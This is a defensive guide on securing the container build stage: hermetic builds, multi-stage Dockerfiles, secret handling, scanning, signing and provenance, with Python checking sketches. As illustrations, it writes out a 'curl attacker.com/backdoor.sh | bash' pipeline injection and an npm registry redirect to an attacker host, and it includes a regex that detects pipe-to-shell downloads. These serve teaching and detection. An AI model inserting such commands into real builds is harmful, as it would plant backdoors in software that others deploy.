Build Stage Security: What Happens Inside the Build and Why It Matters

The build is where source code is transformed into a container image. During this transformation, attackers can inject malicious code, tamper with compilers, poison caches, and modify layers. Build security is the set of controls that prevents or detects these attacks.

What Happens During the Build

A container build is not a single step. It's a sequence of operations that transform source code into a layered filesystem.

A container build passes through four distinct stages. The first stage, build initialization, fetches the base image by its digest to ensure reproducibility, creates the build context by gathering source files and configurations, and initializes the build cache for layer reuse.

The second stage, source compilation, restores all dependencies from lock files to ensure reproducible builds, invokes the appropriate compiler or interpreter for the language, links all libraries, and generates the final build artifacts such as binaries or bytecode.

The third stage, image assembly, copies the compiled artifacts to the runtime image, creates filesystem layers which Docker will cache, sets image metadata including entrypoint, environment variables, and user, and writes the final image to storage or the registry.

The fourth and final stage, image signing and attestation, generates a Software Bill of Materials documenting every component, scans the image for vulnerabilities, signs the image and its attestations, and records the complete build provenance for auditing.

Each step is an attack surface. An attacker who compromises any step can inject malicious code that persists in the final image.

Build Environment Risks: Isolation and Control

The build environment is the machine or container where compilation happens. It has network access, filesystem access, and permission to execute arbitrary commands.

Compromised build tools present a serious risk. Your build system uses specific versions of compilers, linkers, package managers, and build orchestrators. An attacker who infiltrates the build tool repository or performs a man-in-the-middle attack during download can substitute a malicious compiler, which then injects backdoors into every binary it produces. In the variant Ken Thompson described in "Reflections on Trusting Trust", the compiler also reinserts the backdoor whenever it compiles itself, so the compromise is self-perpetuating and very hard to detect from source code alone.

Network access during the build creates additional risks. If your build system has unrestricted network access, an attacker can intercept downloads of dependencies or build tools. For example, during a RUN npm install step, if DNS is compromised and the registry connection is not authenticated over TLS, npm can be directed to an attacker's registry instead of the real one. The malicious packages then install and run their postinstall scripts with the privileges of the build, which is often root.

Non-reproducible builds are dangerous. If the same source code produces different binaries on different builds, you cannot verify the binary's origin. An attacker can claim a binary came from your source code when it actually came from a compromised build system. Reproducibility proves that a specific binary was produced by a specific source without tampering.
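A reproducibility check can be sketched as a digest comparison between the outputs of two independent builds of the same source. This is a minimal illustration, not a complete tool: the function names digest_tree and diff_builds are hypothetical, and it assumes each build writes its artifacts to a directory.

```python
import hashlib
from pathlib import Path


def digest_tree(root: Path) -> dict[str, str]:
    """Map each file's path (relative to root) to its SHA-256 hex digest."""
    digests = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            digests[path.relative_to(root).as_posix()] = hashlib.sha256(
                path.read_bytes()
            ).hexdigest()
    return digests


def diff_builds(first: Path, second: Path) -> list[str]:
    """Return the relative paths that differ between two build output trees."""
    a, b = digest_tree(first), digest_tree(second)
    # A path counts as different if it is missing on one side or its digest changed.
    return sorted(name for name in a.keys() | b.keys() if a.get(name) != b.get(name))
```

An empty result means the two builds produced byte-identical files. Any listed path is either a source of non-determinism (timestamps, build paths) or a sign of tampering, and is worth investigating either way.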

Leaked build secrets are another risk. Build systems often hold secrets such as Docker registry credentials, API keys, and package repository credentials. If a build step echoes a secret to stdout, it ends up in the build log. If a secret is written into an image layer, for example through an ENV or COPY instruction in the Dockerfile, anyone with access to the image can extract it.

Build cache poisoning exploits Docker and other container systems' use of layer caching. If a layer's inputs haven't changed, the cached layer is reused, skipping that build step. An attacker with access to the build cache can modify cached layers. On the next build, the poisoned layers are used, even if the source code hasn't changed.

Build environment controls include several best practices. Hermetic builds isolate the build from the network so that it cannot fetch external resources; all dependencies must be present before the build starts. SLSA v0.1 required hermetic builds at Level 4, while SLSA v1.0 Build L3 requires an isolated build environment without mandating hermeticity. Hermeticity is among the most effective controls: if the build cannot reach the internet, an attacker cannot inject dependencies through a network compromise during the build.

Build tool pinning involves pinning the version of every build tool: the compiler, the package manager, the container runtime, and the linker. Do not use :latest tags. Use specific versions and verify their hashes.

Build isolation means running the build in a dedicated, ephemeral container. After the build finishes, destroy the container. Do not reuse build environments. This prevents an attacker from persisting changes.

Secret management means never baking secrets into images, never logging them, using temporary credentials that are revoked after the build, and using a secret injection system that provides credentials at build time without persisting them in the image.
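As a small illustration of the "do not log secrets" rule, a build wrapper can mask known secret values before a line reaches the log. This is a sketch under the assumption that the wrapper knows the secret values it injected; mask_secrets is a hypothetical helper, not part of any build tool.

```python
def mask_secrets(line: str, secrets: list[str], placeholder: str = "***") -> str:
    """Replace every occurrence of a known secret value in a log line."""
    # Mask longer secrets first so a secret that contains another is fully hidden.
    for secret in sorted(secrets, key=len, reverse=True):
        if secret:  # skip empty strings, which would match at every position
            line = line.replace(secret, placeholder)
    return line
```

Masking is a safety net rather than a substitute for keeping secrets out of command lines and output in the first place, since it only catches values that appear verbatim.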

A read-only build cache means that if you use a shared build cache, builds mount it read-only. The build can read cached layers but cannot modify them, and only a trusted process populates the cache.

Build logging and audit requires logging every build step, every tool execution, and every network request if allowed. Store logs in immutable storage. Regularly audit logs for suspicious activity.

Build-Time Attacks: Injection and Modification

Even with a controlled environment, attackers can still compromise the build through the source code itself.

Malicious build scripts present risk. Your Dockerfile, Makefile, build.gradle, or setup.py contains arbitrary commands that execute with root privileges during the build. An attacker who modifies these scripts (or commits them directly) can inject arbitrary commands that download and execute malware. These scripts are part of source code, so they're often less scrutinized than application code.

CI/CD pipeline exploitation targets the GitHub Actions, GitLab CI, or Jenkins pipeline that runs your build commands. An attacker who modifies the pipeline configuration (.github/workflows/build.yml, .gitlab-ci.yml, Jenkinsfile) can change which commands execute during the build. For example, instead of running npm install && npm run build, the attacker changes the step to curl attacker.com/backdoor.sh | bash && npm install && npm run build. The backdoor runs before the legitimate build.

Environment variable injection is possible because build systems use environment variables to pass configuration. An attacker who modifies Dockerfile environment variables or pipeline variables can inject malicious values. For example, ENV NPM_CONFIG_REGISTRY=http://attacker.com/npm redirects npm downloads to the attacker's registry.
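One way to catch this class of injection is to check registry-related variables against an allowlist before the build starts. The sketch below assumes three variables that package managers are known to honor (NPM_CONFIG_REGISTRY for npm, PIP_INDEX_URL for pip, GOPROXY for Go). The function name and the allowlist are hypothetical and would need extending for other tools.

```python
from urllib.parse import urlparse

# Variables that redirect package downloads for npm, pip, and Go respectively.
REGISTRY_VARS = ("NPM_CONFIG_REGISTRY", "PIP_INDEX_URL", "GOPROXY")


def find_registry_overrides(env: dict[str, str], allowed_hosts: set[str]) -> list[str]:
    """Return 'NAME=value' entries whose URL is not HTTPS on an allowed host."""
    findings = []
    for name in REGISTRY_VARS:
        value = env.get(name)
        if value is None:
            continue
        # GOPROXY may hold a comma- or pipe-separated list; check each entry.
        for entry in value.replace("|", ",").split(","):
            entry = entry.strip()
            # "direct" and "off" are GOPROXY keywords, not URLs.
            if entry in ("", "direct", "off"):
                continue
            url = urlparse(entry)
            if url.scheme != "https" or url.hostname not in allowed_hosts:
                findings.append(f"{name}={entry}")
    return findings
```

A pipeline could call this with dict(os.environ) and the hostname of its internal artifact repository, and refuse to start the build if the result is non-empty.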

Layer modification attacks exploit the fact that Docker layers are stored as files on the build system. An attacker with filesystem access to the build cache can modify them. On the next build, the poisoned layers are reused without being rebuilt.
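When cached layers are stored content-addressed, modification can be detected by re-hashing each blob. The sketch below assumes a cache directory laid out like the blobs/sha256 directory of an OCI image layout, where each file is named after the SHA-256 digest of its contents. Other cache formats would need a different lookup, and find_tampered_blobs is a hypothetical name.

```python
import hashlib
from pathlib import Path


def find_tampered_blobs(blob_dir: Path) -> list[str]:
    """Return names of blobs whose SHA-256 does not match their filename."""
    tampered = []
    for blob in sorted(blob_dir.iterdir()):
        if not blob.is_file():
            continue
        hasher = hashlib.sha256()
        with blob.open("rb") as fh:
            # Read in chunks so large layer tarballs are not loaded into memory.
            for chunk in iter(lambda: fh.read(1 << 20), b""):
                hasher.update(chunk)
        if hasher.hexdigest() != blob.name:
            tampered.append(blob.name)
    return tampered
```

This only detects a blob that no longer matches its own name. An attacker who can also rewrite the manifest that references the blobs must be stopped by signing or by protecting the manifest separately.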

Compiler backdoors occur when the build uses a compromised compiler. Every binary produced is backdoored. This is subtle because the source code is clean, but the compiled output is malicious. Only reproducible builds and binary verification can detect this.

Build-time attack mitigations should include several practices. Build script review means reviewing Dockerfiles, Makefiles, and pipeline configurations as carefully as application code. Look for network requests, shell script execution, and environment variable usage.
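Part of build script review can be automated with a simple pattern scan that flags lines for a human to inspect. The rules below are hypothetical starting points (pipe-to-shell downloads, plain-HTTP URLs, disabled TLS checks), not an exhaustive or authoritative rule set.

```python
import re

# Hypothetical starter rules; tune them to your own build scripts.
RISKY_PATTERNS = {
    "pipe-to-shell": re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    "plain-http": re.compile(r"http://[^\s\"']+"),
    "tls-disabled": re.compile(r"--insecure\b|--no-check-certificate\b"),
}


def lint_build_script(text: str) -> list[tuple[int, str]]:
    """Return (line_number, rule_name) for each risky pattern found."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        for rule, pattern in RISKY_PATTERNS.items():
            if pattern.search(line):
                findings.append((number, rule))
    return findings
```

A scan like this complements code review rather than replacing it: it cannot recognize obfuscated commands, so a clean result is not proof that a script is safe.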

Multi-stage builds separate the build stage from the runtime stage. The build stage runs the compiler and produces artifacts. The runtime stage copies only the artifacts and is much smaller. Any build tools or development dependencies left in the build stage are not included in the final image.

Immutable pipeline configurations require storing pipeline configurations (.github/workflows/, .gitlab-ci.yml) in the main branch with branch protection rules. Require code review before changes are accepted.

Build artifact verification means checking the artifacts after the build: compute checksums, sign the artifacts, generate an SBOM, and verify that the artifacts match expected values.

Hermetic build tools are build systems designed for hermeticity, such as Bazel, Nix, or Buck. These tools are built around isolation and reproducibility, although how strictly they enforce them depends on configuration.

Hermetic Builds: Network Isolation as a Control

A hermetic build cannot access the network. All dependencies must be provided upfront.

Why hermeticity matters: An attacker cannot inject dependencies if the build cannot reach external registries. An attacker cannot intercept downloads if the build makes no downloads. An attacker cannot compromise the build system's network configuration if the build has no network.

How to achieve hermeticity:

Dependency prefetching: before the build starts, download all dependencies, store them locally, compute the hash of each one, and record the hashes in the build configuration.
Offline build environment: run the build in a network-isolated container with no access to the host's network or external networks.
Build tool configuration: configure the package manager and other tools to use only local sources. npm's --offline flag, Go's vendor/ directory, and Maven's -o flag all support this.
Artifact repository: set up an internal artifact repository (Artifactory, Nexus, or a cloud-native alternative) that holds copies of all dependencies, and configure the build to fetch only from it.

The hermetic build flow has five stages. First, dependency prefetching downloads all dependencies from public registries, verifies their hashes, and stores them in an internal artifact repository. Second, the build starts in an isolated environment with no access to external networks. Third, the build pulls dependencies only from the internal repository (not from the internet), compiles the source code, and produces the container image. Fourth, verification confirms that the image matches expected hashes. Fifth, the image and its attestations are cryptographically signed.
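The hash check in the prefetch stage can be sketched as a comparison between a directory of downloaded files and a lock that pins each file's digest. This is a simplified illustration: verify_prefetched and the flat filename-to-digest lock are assumptions, and real package managers use their own lock file formats.

```python
import hashlib
from pathlib import Path


def verify_prefetched(dep_dir: Path, lock: dict[str, str]) -> list[str]:
    """Compare prefetched files against pinned SHA-256 digests.

    Returns a list of problems; an empty list means the directory matches the lock.
    """
    problems = []
    present = {p.name for p in dep_dir.iterdir() if p.is_file()}
    for name, expected in sorted(lock.items()):
        if name not in present:
            problems.append(f"missing: {name}")
            continue
        actual = hashlib.sha256((dep_dir / name).read_bytes()).hexdigest()
        if actual != expected:
            problems.append(f"hash mismatch: {name}")
    # Files that are not in the lock are rejected rather than silently used.
    problems.extend(f"unexpected: {name}" for name in sorted(present - set(lock)))
    return problems
```

Rejecting unexpected files as well as mismatched ones matters here, because an extra package in the local repository could otherwise be picked up by the isolated build without ever having been reviewed.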

Several tools are designed around hermeticity: Bazel, Nix, and YAML-based specification languages restrict ad-hoc network requests and favor deterministic builds. These approaches declare dependencies upfront, prefetch them, and then run isolated from the network. This removes many build-time attack vectors because build steps cannot make arbitrary network requests, and purely declarative specifications also leave no room for ad-hoc shell commands.

Multi-Stage Builds: Separation of Concerns

A multi-stage build uses multiple FROM statements. Each stage can have different tools, libraries, and size.

    # Stage 1: Build (large, includes compiler and development tools)
    FROM golang:1.21-alpine AS builder
    WORKDIR /src
    COPY go.mod go.sum ./
    RUN go mod download
    COPY . .
    RUN CGO_ENABLED=0 go build -o /bin/app .

    # Stage 2: Runtime (minimal, includes only the binary)
    FROM alpine:3.18
    RUN apk add --no-cache ca-certificates
    COPY --from=builder /bin/app /app
    ENTRYPOINT ["/app"]

In Stage 1 (builder), you have the full Go toolchain, all dependencies, and source code. The compiler, linker, and package manager all run here. Build artifacts are produced. In Stage 2 (runtime), only the compiled binary and runtime essentials are present. The compiler, package manager, and source code are not included.

Benefits of multi-stage builds include:

Smaller final image: the runtime image has no compiler or development tools, so it is much smaller. A 1 GB build stage might produce a 50 MB runtime image.
Reduced attack surface: the runtime image has fewer packages and tools, so fewer vulnerabilities.
Clear separation: build dependencies and runtime dependencies are explicitly separated, making it easier to audit what is in the runtime image.
Layer optimization: Docker caches layers, the build stage's layers are cached separately from the runtime stage's, and a change to the source code doesn't invalidate the base image layer.

The Builder Pattern: Variant Strategies

Some projects maintain two Dockerfiles: Dockerfile.dev for the build environment and Dockerfile.prod for the runtime environment. This makes the separation explicit and prevents accidentally shipping development tools.

CleanStart takes this a step further by using a unified YAML specification from which build configurations are generated automatically. The specification declares build-stage requirements (language, compiler version, dependencies), runtime-stage requirements (minimal runtime, UID, capabilities), source locations (git repositories with commit signatures), and artifact locations (what gets copied to the runtime stage). The CleanStart build system reads this specification, constructs a hermetic build environment, compiles the source, generates the runtime image, and produces attestations. This approach removes much of the Dockerfile complexity and reduces the chance of misconfiguration.

Dockerfile Security Pitfalls

If you use Dockerfiles instead of a more structured approach, watch for these common mistakes.

Running as root: by default, RUN commands execute as root, so if the build is compromised, the injected commands run with full privileges inside the build container. Use USER to switch to a non-root user for build steps that don't require root.

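    FROM ubuntu:22.04
    RUN apt-get update && apt-get install -y build-essential
    # Create the unprivileged user before switching to it
    RUN useradd --create-home builder
    USER builder:builder
    # Copy sources owned by the build user so make can write its outputs
    COPY --chown=builder:builder . /src
    RUN cd /src && make build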

Secrets in layers: every RUN command creates a layer, and every layer is part of the image. If you RUN curl https://example.com/secret-api-key.pem, that URL is visible in the image history, and the downloaded secret remains in the layer even if a later step deletes it.

Use BuildKit secret mounts (RUN --mount=type=secret, with the value supplied through docker build --secret) to pass secrets to the build without baking them into layers:

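    # npm config set writes the token to ~/.npmrc, so remove it again in the same RUN step
    RUN --mount=type=secret,id=npm_token \
        npm config set //registry.npmjs.org/:_authToken=$(cat /run/secrets/npm_token) && \
        npm install && \
        npm config delete //registry.npmjs.org/:_authToken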

Unverified COPY: when you COPY . /app, you copy everything in the build context (the directory you pass to docker build). If an attacker can modify the build context, they can inject files. Verify the build context's contents before building.

Running package managers without verification: RUN apt-get update && apt-get install -y curl fetches whatever packages the remote repositories currently serve, without checking them against versions or hashes that you have pinned. apt verifies repository signatures, but if the repository or its signing key is compromised, poisoned packages install. Use hermetic builds to avoid this.

Using :latest tags: FROM ubuntu:latest lets the publisher change what the tag points to, so your image is non-reproducible. Version tags such as 22.04 can also be moved. Use a specific version together with a digest: FROM ubuntu:22.04@sha256:a1b2c3d4e5f6....
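The digest-pinning rule is easy to check mechanically. The sketch below scans a Dockerfile's FROM lines and reports images that lack an @sha256 digest. It is a simplified parser (the function name is hypothetical, and it does not expand ARG variables used in FROM lines), so treat it as a starting point rather than a complete linter.

```python
import re

DIGEST = re.compile(r"@sha256:[0-9a-f]{64}$")


def unpinned_base_images(dockerfile: str) -> list[str]:
    """Return image references in FROM lines that are not pinned by digest."""
    stages: set[str] = set()
    unpinned = []
    for line in dockerfile.splitlines():
        parts = line.split()
        if not parts or parts[0].upper() != "FROM":
            continue
        # Drop flags such as --platform=linux/amd64 that precede the image.
        args = [p for p in parts[1:] if not p.startswith("--")]
        if not args:
            continue
        image = args[0]
        # "scratch" and earlier stage names are not registry images.
        if image != "scratch" and image not in stages and not DIGEST.search(image):
            unpinned.append(image)
        if len(args) >= 3 and args[1].upper() == "AS":
            stages.add(args[2])
    return unpinned
```

Run against a two-stage Dockerfile that uses golang:1.21-alpine and alpine:3.18 by tag only, this would report both images, since neither FROM line carries a digest.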

Build Scanning and Attestation

After the build produces an image, scanning and attestation capture what the image contains and who built it.

Software Bill of Materials (SBOM) lists every package, library, and component in the image. Tools like Syft generate SBOMs in standard formats (SPDX, CycloneDX). The SBOM documents exactly what's in the image and enables dependency scanning at scale.

Image scanning for vulnerabilities: after the build, vulnerability scanners (Trivy, Clair, Grype) run on the image to identify known CVEs in installed packages. If critical vulnerabilities are found, the pipeline should fail the build and alert the team.
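A build gate on scan results can be sketched as a small filter over the scanner's JSON report. The example assumes a report shaped like Trivy's JSON output (a top-level "Results" list whose entries carry a "Vulnerabilities" list with "VulnerabilityID" and "Severity" fields). Check the field names against the schema of the scanner and version you actually run; blocking_findings is a hypothetical name.

```python
import json


def blocking_findings(report_json: str, blocked=frozenset({"CRITICAL"})) -> list[str]:
    """Return IDs of vulnerabilities whose severity should fail the build."""
    report = json.loads(report_json)
    ids = []
    for result in report.get("Results") or []:
        # Targets with no findings may omit the key or set it to null.
        for vuln in result.get("Vulnerabilities") or []:
            if vuln.get("Severity", "").upper() in blocked:
                ids.append(vuln.get("VulnerabilityID", "unknown"))
    return ids
```

A pipeline step could exit with a non-zero status whenever the returned list is non-empty, which is what makes the build fail rather than merely warn.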

Image signing means signing the image and its attestations. Use Cosign (part of Sigstore) to sign container images, either with a key pair or keylessly with short-lived certificates bound to an OIDC identity. Signatures can then be verified at deployment time, for example by an admission controller, to ensure the image has not been tampered with.

Build provenance generates a build attestation in SLSA Provenance format that records the build environment (OS, tool versions), the source code (git repo, commit hash), the build configuration (compiler flags, dependencies), and the output artifacts (image digest, checksums). This provenance proves that a specific image was built from a specific source by a specific build system.

Example attestation (simplified; the field names loosely follow the older SLSA Provenance v0.2 layout, and sourceUri and byproducts are illustrative additions rather than part of that schema):

    {
      "buildType": "https://github.com/cleanstart/build/v1",
      "builder": {
        "id": "https://github.com/cleanstart/builder/v1"
      },
      "sourceUri": "git+https://github.com/myorg/myapp@v1.2.3",
      "invocation": {
        "configSource": {
          "uri": "git+https://github.com/myorg/myapp@refs/heads/main",
          "digest": {
            "sha256": "abc123def456..."
          }
        }
      },
      "buildConfig": {
        "version": "3.4.0",
        "os": "linux",
        "arch": "amd64"
      },
      "materials": [
        {
          "uri": "pkg:npm/lodash@4.17.21",
          "digest": {
            "sha256": "def456abc123..."
          }
        }
      ],
      "byproducts": {
        "sbom": {
          "location": "oci://registry.example.com/myapp:v1.2.3.sbom",
          "mediaType": "application/spdx+json"
        }
      }
    }
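Provenance is only useful if every input it lists can be checked. As a minimal sketch against the example document's layout (a "materials" list whose entries have a "uri" and a "digest.sha256"), the following hypothetical helper reports materials that were recorded without a digest.

```python
import json


def materials_without_digest(attestation_json: str) -> list[str]:
    """Return URIs of materials that lack a SHA-256 digest."""
    attestation = json.loads(attestation_json)
    missing = []
    for material in attestation.get("materials") or []:
        digest = (material.get("digest") or {}).get("sha256")
        if not digest:
            missing.append(material.get("uri", "<no uri>"))
    return missing
```

A policy check could reject any attestation for which this list is non-empty, since a dependency recorded by name and version alone cannot be tied to specific bytes.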

Attestation storage: attestations can be stored in the registry alongside the image (as OCI artifacts) or kept separately. Cosign stores signatures and attestations in the registry as separate artifacts associated with the image's digest.

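    # Sign the image
    cosign sign --key cosign.key ghcr.io/myorg/myapp:v1.2.3
    # Sign attestation.json as a predicate and attach it to the image
    cosign attest --key cosign.key --predicate attestation.json --type custom \
      ghcr.io/myorg/myapp:v1.2.3
    # Verify the image signature
    cosign verify --key cosign.pub ghcr.io/myorg/myapp:v1.2.3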

From Build to Runtime

The build stage produces a container image. But the image's security properties only persist if the runtime stage enforces them.

Build Security Checklist

[ ] Base image is pinned by digest, not by tag.
[ ] Build runs in an isolated, ephemeral environment (hermetic build).
[ ] Build has no network access (all dependencies prefetched).
[ ] All build tools are pinned to specific versions.
[ ] Multi-stage builds are used to separate build and runtime.
[ ] No secrets are baked into image layers.
[ ] No build tools or development dependencies are included in the final image.
[ ] Artifacts are generated in the build stage and copied (not left as layers).
[ ] Non-root user is used for build steps where possible.
[ ] Image is scanned for vulnerabilities after the build.
[ ] SBOM is generated and attached to the image.
[ ] Image and attestations are signed.
[ ] Build provenance is recorded in SLSA format.
[ ] CI/CD pipeline configuration is reviewed and protected with branch rules.
[ ] Build logs are stored immutably and audited regularly.

Next Steps: Build Securely Across Your Supply Chain

Understanding the build: learn what secure builds look like.
Pre-Build Stage Security: control what source and dependencies enter the build.
Container Image Fundamentals: understand what you're building.
The 11 Build Artifacts: what a secure build generates (SBOMs, signatures, provenance).

Implementing secure builds: practical guidance for your CI/CD.
The Continuous Trust Loop: automated rebuilds when vulnerabilities are detected.
Verified Source Philosophy: design principles for building from known sources.
Dockerfile to YAML Migration: modernize your build specifications.

Deployment and operations: maintain security after the build.
End-to-End Secure Deployment: deploy with scanning and verification.
Helm Charts & Kubernetes: operate images securely at scale.
Supply Chain Disaster Recovery: protect your supply chain integrity.

Summary

Build security protects the transformation from source code to container image. It operates on three fronts: the build environment (isolation and control), the build process (compilation and assembly), and build outputs (scanning, signing, and attestation).

Without build-stage controls, attackers can inject malicious code during compilation. With them (hermetic builds, multi-stage Dockerfiles, dependency verification, image scanning, and provenance attestation), you gain strong evidence that the image you deploy matches the source code you reviewed.

The pre-build stage controls what code enters the build (see Pre-Build Stage Security). The build stage ensures that code is compiled safely and attestations are generated. The runtime stage then executes the image safely and detects attacks (see Runtime Stage Security).

Build Tooling: Alternative Approaches

Multiple tools and approaches exist for securing the build stage.

Docker + best practices uses standard Dockerfile with explicit adherence to security practices (pinning base images by digest, multi-stage builds, no secrets, immutable attestations). Advantages include ubiquity and being widely understood. Disadvantages are that it requires discipline and is easy to misconfigure.

Buildah is an OCI-native builder that supports rootless builds and explicit layer control. Advantages include fine-grained control and requiring no Docker daemon. Disadvantages are a steeper learning curve and less documentation.

Bazel is a hermetic build system enforcing reproducibility and isolation by design. Advantages include enforcing best practices automatically and being excellent for polyglot projects. Disadvantages include a significant learning curve, slower performance for simple projects, and requiring a rethinking of builds.

Nix is a purely functional package manager and build system. Advantages include strong reproducibility and excellent supply chain controls. Disadvantages include a steep learning curve and a very different paradigm from traditional builds.

Declarative YAML-based builders use build specifications that declare dependencies and outputs rather than prescribing build steps. Advantages include less opportunity for misconfiguration and being easier to verify for hermeticity. Disadvantages are that they're less flexible for complex builds and have a newer ecosystem with fewer examples.

Cloud-native build services (Cloud Build, GitHub Actions, GitLab CI) are managed build environments with built-in isolation and logging. Advantages include having no infrastructure to manage and built-in compliance logging. Disadvantages include vendor lock-in and less control over the build environment.

The common principle across all approaches: control the build environment, eliminate ad-hoc network access, verify artifacts, and generate provenance attestations.